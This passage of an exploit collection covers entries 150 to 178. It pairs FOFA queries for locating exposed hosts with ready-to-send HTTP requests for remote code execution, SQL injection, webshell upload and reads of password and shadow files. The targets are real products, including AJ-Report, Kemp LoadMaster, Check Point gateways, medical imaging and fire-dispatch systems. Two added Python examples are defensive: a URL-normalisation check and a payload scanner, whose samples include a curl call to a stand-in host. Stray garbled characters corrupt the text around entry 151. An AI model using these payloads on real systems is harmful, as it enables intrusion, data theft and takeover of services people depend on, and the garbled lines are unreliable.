User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA: title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

The ;swagger-ui/ suffix is a servlet path parameter: the login filter sees "swagger-ui" in the URI and exempts the request, while the container strips the ;... part before routing and dispatches to /dataSetParam/verification. The validationRules script then runs in the server-side JavaScript engine.

+ j! @) L& H. A& G8 l7 I151. AJ-Report 1.4.1 pageList sql注入
( d7 \0 ^' ~' Q9 U2 CFOFA:title="AJ-Report"
5 x7 f9 L$ J8 X$ ^% L" WGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
3 V' k+ s* n/ j$ ]; k/ zHost: x.x.x.x5 ~% c  c9 s! x! H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# h- s, V; f5 S) EConnection: close! t4 \- [( T$ h1 ~
Accept-Encoding: gzip
3 e' p: a. U& i( L; c% f. r3 x! F; Z% j/ |3 G$ Z1 G
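Entries 132 (the ;.jsp and ../ paths) and 149 to 151 (the ;swagger-ui/ prefix) defeat the same kind of filter: an authentication exemption that inspects the URI as sent, while the servlet container routes on a normalised path. The comparison below is an added example, not AJ-Report or TeamCity code; the exemption rule, the public allow-list and the route names are assumptions chosen to mirror the PoCs.

```python
import posixpath
import re
from urllib.parse import unquote


def is_exempt_raw(raw_uri: str) -> bool:
    """Assumed interceptor rule: requests for the API-docs UI and for JSP
    pages need no session. It is judged on the URI exactly as sent."""
    return "swagger-ui" in raw_uri or raw_uri.endswith(".jsp")


def naive_requires_auth(raw_uri: str) -> bool:
    """Vulnerable decision: the exemption looks at the raw URI, but the servlet
    container strips ';param' segments and resolves '..' before dispatching,
    so the handler that finally runs is not the one that was exempted."""
    return not is_exempt_raw(raw_uri)


def normalize_servlet_path(raw_uri: str) -> str:
    """Approximate what the container does before routing: drop the query
    string, percent-decode, strip ';...' from every segment, squeeze repeated
    slashes and collapse '.' and '..' segments."""
    path = unquote(raw_uri.split("?", 1)[0])
    path = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    path = re.sub(r"/+", "/", path)
    if not path.startswith("/"):
        path = "/" + path
    return posixpath.normpath(path)


# Assumed allow-list of unauthenticated paths, matched on the normalized path only.
PUBLIC_PATHS = {"/login.jsp"}
PUBLIC_PREFIXES = ("/swagger-ui/", "/webjars/")


def hardened_requires_auth(raw_uri: str) -> bool:
    """Same policy, decided on the path the container will actually route."""
    path = normalize_servlet_path(raw_uri)
    if path in PUBLIC_PATHS:
        return False
    return not any(path.startswith(prefix) for prefix in PUBLIC_PREFIXES)


BYPASS_URIS = [  # request shapes taken from the PoCs above
    "/dataSetParam/verification;swagger-ui/",                    # AJ-Report (149/150)
    "/;swagger-ui/dataSource/pageList?pageNumber=1&pageSize=10",  # AJ-Report 1.4.1 (151)
    "/app/rest/users;.jsp",          # TeamCity CVE-2024-27198: the path named by the jsp= parameter
    "/res/../admin/diagnostic.jsp",  # TeamCity CVE-2024-27199
    "/.well-known/acme-challenge/../../admin/diagnostic.jsp",
]


def compare(uris=BYPASS_URIS):
    """Map each URI to (naive decision, hardened decision, normalized path);
    True means the request must carry a valid session."""
    return {u: (naive_requires_auth(u), hardened_requires_auth(u), normalize_servlet_path(u))
            for u in uris}


if __name__ == "__main__":
    for uri, (naive, hardened, norm) in compare().items():
        print(f"{uri!r:62} naive={'auth' if naive else 'OPEN'}  hardened={'auth' if hardened else 'OPEN'}  -> {norm}")
```

Every entry in BYPASS_URIS is waved through by the naive check and stopped by the hardened one, while legitimate public paths such as /swagger-ui/index.html stay open. The general rule: authorise on the same normalised path the framework routes on, and express exemptions as exact paths or prefixes on that path, never as substrings or suffixes of the raw URI.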

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA: body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter, sent as the Basic auth credential; the quoted part is spliced into a shell command.
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

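Several of the payloads above hide from a naive grep: the SQL in 122 and the command in 144 travel base64-encoded in a query parameter, the shell metacharacters in 152 sit inside the Basic auth token, the PAN-OS payload in 145 sits in a cookie, and the time-based injections in 134 to 141 are percent-encoded. The scanner below is an added example, not a detection rule from any product named on this page; the log lines are constructed from the requests above, and which parameters to decode and which patterns to flag are assumptions a defender would tune for their own traffic.

```python
import base64
import binascii
import re
from typing import Dict, Iterator, List, Optional, Tuple
from urllib.parse import unquote

# Heuristic patterns applied to every decoded view of a value (assumed rule set).
RULES = {
    "sqli": re.compile(
        r"union[\s+]+(?:all[\s+]+)?select|select\b.*\bfrom\b|sleep\(|pg_sleep\(|"
        r"updatexml\(|extractvalue\(|database\(\)|version\(\)",
        re.I,
    ),
    "cmdi": re.compile(
        r";|\|\||&&|`|\$\{IFS\}|\$\(|^\s*(?:id|ls|cat|whoami|uname|curl|wget)\b",
        re.I,
    ),
    "traversal": re.compile(r"\.\./|%2e%2e|/etc/passwd|windows/win\.ini", re.I),
}
_B64 = re.compile(r"^[A-Za-z0-9+/=_-]{4,}$")


def decode_views(raw: str) -> Iterator[Tuple[str, str]]:
    """Yield the percent-decoded value and, when it looks like base64 and
    decodes to readable text, the base64-decoded value as well."""
    text = unquote(raw)
    yield "url", text
    token = text.strip()
    if _B64.match(token):
        padded = token.replace("-", "+").replace("_", "/") + "=" * (-len(token) % 4)
        try:
            decoded = base64.b64decode(padded, validate=False).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            return  # not base64, or binary: nothing more to look at
        if all(ch.isprintable() or ch in "\r\n\t" for ch in decoded):
            yield "base64", decoded


def check_value(where: str, raw: str) -> List[Dict[str, str]]:
    """Run every rule over every decoded view of one value."""
    return [
        {"where": where, "view": view, "rule": rule, "text": text}
        for view, text in decode_views(raw)
        for rule, rx in RULES.items()
        if rx.search(text)
    ]


def scan_request(request_line: str, headers: Optional[Dict[str, str]] = None) -> List[Dict[str, str]]:
    """Scan 'METHOD target HTTP/x' plus the headers attackers use as carriers
    (Cookie values, Basic auth credentials)."""
    target = request_line.split(" ")[1]
    path, _, query = target.partition("?")
    findings = check_value("path", path)
    for pair in filter(None, query.split("&")):
        name, _, value = pair.partition("=")
        findings += check_value(f"query:{name}", value)
    for hname, hvalue in (headers or {}).items():
        if hname.lower() == "cookie":
            for pair in hvalue.split(";"):
                name, _, value = pair.strip().partition("=")
                findings += check_value(f"cookie:{name}", value)
        elif hname.lower() == "authorization" and hvalue.lower().startswith("basic "):
            findings += check_value("header:authorization", hvalue[6:].strip())
    return findings


SAMPLES = [  # constructed request lines; shapes copied from entries 122, 144, 152, 135, 145
    ("GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1", None),
    ("GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1", None),
    ("GET /access/set?param=enableapi&value=1 HTTP/1.1", {"Authorization": "Basic JztsczsnOmRvZXNub3RtYXR0ZXI="}),
    ("GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(1)),0x7e)) HTTP/1.1", None),
    ("GET /global-protect/login.esp HTTP/1.1",
     {"Cookie": "SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/x`curl${IFS}example.invalid`;"}),
    ("GET /api/users?page=2&sort=name HTTP/1.1", None),  # benign control
]


def scan_samples() -> Dict[str, List[Tuple[str, str, str]]]:
    """Map each sample request line to its sorted (where, view, rule) hits."""
    return {
        line: sorted({(f["where"], f["view"], f["rule"]) for f in scan_request(line, headers)})
        for line, headers in SAMPLES
    }


if __name__ == "__main__":
    for line, hits in scan_samples().items():
        print(line.split(" ")[1][:60], "->", hits or "clean")
```

The point of the base64 view is that the D-Link and LoadMaster payloads are invisible in the raw log line; the point of decoding per parameter rather than per line is that a cookie separator or a legitimate semicolon elsewhere does not drown the real hit. Tune RULES against your own traffic before alerting on it; the semicolon and the bare command words are deliberately aggressive.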
153. gradio arbitrary file read
CVE-2024-1561
FOFA: body="__gradio_mode__"
Step 1: request /config and take a component id from the components list
http://x.x.x.x/config

Step 2: make the server copy /etc/passwd into its temporary cache
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: fetch the cached copy at the path returned by step 2
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. 天维尔 fire-and-rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA: body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 163
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

The PG_SLEEP(5) call shows the backend is PostgreSQL; a response delayed by about five seconds confirms the injection.

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA: title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

The response returns the stored name; the file is then reachable at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical image archiving and communication system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 (Keytop) fully intelligent parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 (lean value management system) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景 (Hongjing) EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景 EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和 (Jinher) OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

